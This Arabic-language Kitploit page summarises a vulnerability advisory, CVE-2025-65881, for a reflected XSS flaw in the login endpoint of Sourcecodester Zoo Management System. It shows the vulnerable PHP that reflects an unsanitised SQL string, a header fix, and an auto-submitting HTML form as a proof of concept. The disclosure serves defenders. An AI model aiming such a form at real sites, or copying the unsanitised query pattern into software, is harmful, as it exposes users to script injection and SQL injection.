Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65881 — Sourcecodester Zoo Management System v1.0 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في /classes/Login.php بسبب Content-Type غير صالح | Kitploit
أدوات/GitHubGitHub/mmakingdom/cve-2025-65881
تحليل الثغرات الأمنيةتحليل الكوداستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubmmakingdom/cve-2025-65881

CVE-2025-65881

Sourcecodester Zoo Management System v1.0 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في /classes/Login.php بسبب Content-Type غير صالح

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-65881

مشروع Zoo Management System v1.00 عرضة لثغرة البرمجة النصية عبر المواقع (XSS) في /zms/classes/Login.php?f=login بسبب:

  1. Content-type غير صالح لاستجابات JSON في /zms/classes/Login.php?f=login
  2. إدخال المستخدم غير المعقّم في الاستجابات

مما يسمح للمهاجمين غير المصادَق عليهم بحقن HTML/JS خبيث يتم تنفيذه في متصفحات الضحايا.

الملف المتأثر والكود الضعيف

/zms/classes/Login.php

root@kitploit:~
return json_encode(array(
    'status' => 'incorrect',
    'last_qry' => "SELECT * from users where username = '$username' and password = md5('$password') "
));

السبب الجذري

  1. لا تعيّن نقطة النهاية نوع المحتوى إلى application/json.
  2. لا يتم تعقيم معامل $username عند استخدامه في استعلامات SQL أو عند انعكاسه في الاستجابة، وقد أدى هذا العيب نفسه سابقًا إلى ثغرة حقن SQL (CVE-2025-7160)

المعالجة

أضف هذا السطر في الدالة login():

root@kitploit:~
public function login(){
		header('Content-Type: application/json; charset=utf-8');
		extract($_POST);

header

إثبات المفهوم

root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="http://localhost/zms/classes/Login.php?f=login" method="post">
      <input type="hidden" name="username" value="awdawdawdawdawaaaa$" />
    <input type="hidden" name="password" value="awdawda" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

XSS

المراجع

يمكن تنزيل الكود المصدري مجانًا من هنا:

https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html

الفضل

Muntadhar M. Ahmed (almuntadhar0x01)

تنزيل الأداة